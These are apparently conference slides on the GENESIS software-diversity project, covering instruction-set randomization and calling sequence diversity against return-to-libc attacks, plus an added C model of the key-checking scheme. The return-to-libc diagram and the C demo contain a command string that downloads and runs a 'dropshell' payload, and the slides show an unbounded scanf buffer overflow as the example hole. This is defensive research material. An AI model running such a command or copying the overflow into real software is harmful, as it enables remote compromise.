GENESIS: A Framework For Achieving Component Diversity
John C. Knight, Jack W. Davidson, David Evans, Anh Nguyen-Tuong (University of Virginia)
Chenxi Wang (Carnegie Mellon University)
Project Overview
• Existing practice:
  • Monoculture
• Technical objectives:
  • Exploit artificial diversity to break the existing software monoculture
• Technical approach:
  • Artificial diversity at compile, link, load, and execution times
  • Combinations selectable with the toolkit
DARPA SRS July 2005 PI Meeting
Project Overview
• Major risks and planned mitigation:
  • Susceptibility to a new class of attacks
  • Deployment issues
  • Ad hoc evaluation
• Quantitative metric:
  • Fraction of variants that remain susceptible to attack after transformation
• Expected major achievement:
  • Significant reduction in susceptibility
• Task milestones (scheduled 12/31/05):
  • Complete diversity toolkit
  • Evaluate complete spectrum of diversity techniques
Genesis Diversity Toolkit (architecture diagram; figure not in extraction)
Genesis Diversity Generator (diagram; figure not in extraction)
Strong ISR using AES and IT
• Randomized Instruction Set Emulation, E. G. Barrantes, D. H. Ackley, S. Forrest, and D. Stefanović, ACM Transactions on Information and System Security 8(1), pp. 3-40
• Current implementations of ISR still execute injected code: it is de-randomized with the wrong key, so what runs is a random instruction sequence
  • Rely on probabilistic arguments that the random sequences will crash harmlessly
  • Not realistic for critical embedded systems
  • Recovery of the application is difficult/impossible
• Vulnerable to attack:
  • Where's the FEEB?, Ana Sovarel and Dave Evans, USENIX Security Conference, August 2005
• Overhead issues (both space and time)
Strong ISR using AES and IT (two diagram slides; figures not in extraction)
CSD: Calling sequence diversity
• Compile-time/runtime technique to create a software population with many different calling sequences
• Effective defense against "return-to-libc" attacks (also known as arc injection; Pincus and Baker, IEEE Security & Privacy 2(4), pp. 20-27)
  • Return-to-libc does not require injecting code into the application
  • ISR is therefore not an effective defense against return-to-libc attacks
Return-to-libc attack

    void bar(int arg1, int arg2) {
        char buffer[100];
        …
        scanf("%s", buffer);
        …
    }

Runtime stack before the overflow (higher addresses at the top):
    …
    arg2
    arg1
    return addr
    saved ebp
    buffer

Runtime stack after the buffer overflow:
    …
    arg2        <- bad arg: pointer to "wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell"
    arg1
    return addr <- address of system()
    saved ebp
    buffer

When bar returns, control lands in system(); it treats the arg1 slot as its own return address and the arg2 slot as its argument, so the command string runs without any code being injected.
CSD: Calling sequence diversity

    void bar() {
        …
        key = Keygen(key, &bar, &foo);
        foo(arg1, arg2);
        key = Keygen(key, &foo, &bar);
        …
        key = Keygen(key, &bar, &baz);
        baz(arg);
        key = Keygen(key, &baz, &bar);
        …
    }

    void foo(int a1, int a2) {
        Keycheck(key);
        …
        Keycheck(key);
    }
CSD: Calling sequence diversity
• Calls to the Keygen and Keycheck routines are inserted by the compiler front end (lcc, edg, Phoenix)
• At runtime:
  • Strata generates a key for each function (stored in a protected region)
  • Replaces the calls with inline code that generates the proper key or checks that the key has the proper value
Return-to-libc attack (slide repeated after the CSD mechanism; same code and stack diagram as the earlier return-to-libc slide, with the vulnerable function named bad)
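The following is an added example, not code from the GENESIS toolkit or the Strata translator. It models calling sequence diversity as the two CSD slides describe it and then replays the return-to-libc scenario from the stack diagram against it. It takes the slides at face value: every function f gets a per-variant key K_f (the small table stands in for the protected region Strata would keep the keys in), Keygen turns the caller's key into the callee's, and Keycheck in the callee compares the live key against K_f. The key derivation, the variant seed, the XOR form of Keygen and system_stub (a stand-in for libc's system()) are assumptions made for the demonstration; a deployed variant would have Strata inline these operations and terminate on a failed check rather than record it.

```c
#include <stdint.h>
#include <stdio.h>

/* Added example, not the GENESIS toolkit's code: a single-threaded model of
 * calling sequence diversity.  Per-function keys live in `table` (stands in
 * for Strata's protected region); derive_key(), the seed, the XOR Keygen and
 * system_stub() are assumptions for the demonstration. */

#define MAX_FUNCS 8
#define FN(f) ((uintptr_t)(f))       /* identify a function by its address */

typedef uint64_t csd_key_t;

static struct { uintptr_t fn; csd_key_t key; } table[MAX_FUNCS];
static int nfuncs;
static csd_key_t key;                /* the "key" variable on the slide */

/* Draw a function's key when a variant is built (splitmix64 finalizer keyed
 * by the variant seed; the real generator is not described on the slides). */
static csd_key_t derive_key(uint64_t seed, uintptr_t fn) {
    uint64_t x = seed + fn * 0x9e3779b97f4a7c15ULL;
    x = (x ^ (x >> 30)) * 0xbf58476d1ce4e5b9ULL;
    x = (x ^ (x >> 27)) * 0x94d049bb133111ebULL;
    return x ^ (x >> 31);
}

/* Look up K_f.  An unregistered target gets 0, which no real key equals. */
static csd_key_t key_of(uintptr_t fn) {
    for (int i = 0; i < nfuncs; i++)
        if (table[i].fn == fn) return table[i].key;
    return 0;
}

static void build_variant(uint64_t seed, const uintptr_t *fns, int n) {
    nfuncs = n;
    for (int i = 0; i < n; i++) {
        table[i].fn  = fns[i];
        table[i].key = derive_key(seed, fns[i]);
    }
}

/* Keygen(key, &from, &to): cancel the caller's key, mix in the callee's. */
static csd_key_t Keygen(csd_key_t k, uintptr_t from, uintptr_t to) {
    return k ^ key_of(from) ^ key_of(to);
}

/* Keycheck: does the live key match the function we are in?  A deployed
 * variant would abort on mismatch; the model records the outcome instead. */
static int Keycheck(uintptr_t self) { return key == key_of(self); }

static int foo_ok, system_ok;

static void foo(int a1, int a2) {
    foo_ok = Keycheck(FN(foo));          /* check on entry ... */
    (void)a1; (void)a2;
    foo_ok &= Keycheck(FN(foo));         /* ... and again before returning */
}

/* Stand-in for libc's system(): the return-to-libc target on the slide. */
static void system_stub(const char *cmd) {
    system_ok = Keycheck(FN(system_stub));
    (void)cmd;
}

/* bar as the compiler front end instruments it: Keygen around the call. */
static void bar(void) {
    key = Keygen(key, FN(bar), FN(foo));
    foo(1, 2);
    key = Keygen(key, FN(foo), FN(bar));
}

static void setup(uint64_t seed) {
    const uintptr_t fns[] = { FN(bar), FN(foo), FN(system_stub) };
    build_variant(seed, fns, 3);
    key = key_of(FN(bar));               /* as if bar were entered legitimately */
}

/* Legitimate path bar -> foo -> bar: 1 if every check passed. */
int legitimate_call_passes(void) {
    setup(1);
    foo_ok = 0;
    bar();
    return foo_ok && key == key_of(FN(bar));
}

/* Hijacked path: the smashed return address sends control straight into
 * system_stub, so no Keygen for the (bar, system) edge runs and key is
 * still K_bar when system_stub's Keycheck executes. */
int hijacked_call_passes(void) {
    setup(1);
    system_ok = 1;
    void (*ret_addr)(const char *) = system_stub;   /* attacker-chosen target */
    ret_addr("wget http://www.example.com/dropshell ; chmod +x dropshell ; ./dropshell");
    return system_ok;
}

/* Diversity: variants built from different seeds expect different K_foo, so
 * a key value observed in one variant is useless against another. */
int variants_expect_different_keys(void) {
    setup(1); csd_key_t a = key_of(FN(foo));
    setup(2); csd_key_t b = key_of(FN(foo));
    return a != b;
}

int main(void) {
    printf("legitimate call chain: %s\n", legitimate_call_passes() ? "checks pass" : "CHECK FAILED");
    printf("return-to-libc jump  : %s\n", hijacked_call_passes() ? "checks pass" : "CHECK FAILED");
    printf("variants differ      : %s\n", variants_expect_different_keys() ? "yes" : "no");
    return 0;
}
```

The point to take from the hijacked path is that CSD does not care whether code was injected: the attacker reaches system() with the key still set for bar, because only the compiler-inserted Keygen on a legitimate edge can produce K_system. The caveat the model makes visible is that the scheme depends on the key and the key table being unwritable by the attacker; with an arbitrary-write primitive the table is the target, which is why the slides put it in a protected region.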
Genesis Diversity Toolkit (architecture diagram repeated; figure not in extraction)
Toolkit Execution Environment (diagram slide; figure not in extraction)
Performance (results slide; figure not in extraction)
Progress Towards Metric
• Diversity toolkit facilitates:
  • Creation of a large number of variants
  • Operating, attacking & monitoring variants
• Large numbers of variants of Apache created and tested; success rate very high
• Disclaimers:
  • Only one application
  • Synthetic but realistic vulnerabilities
  • No statistical significance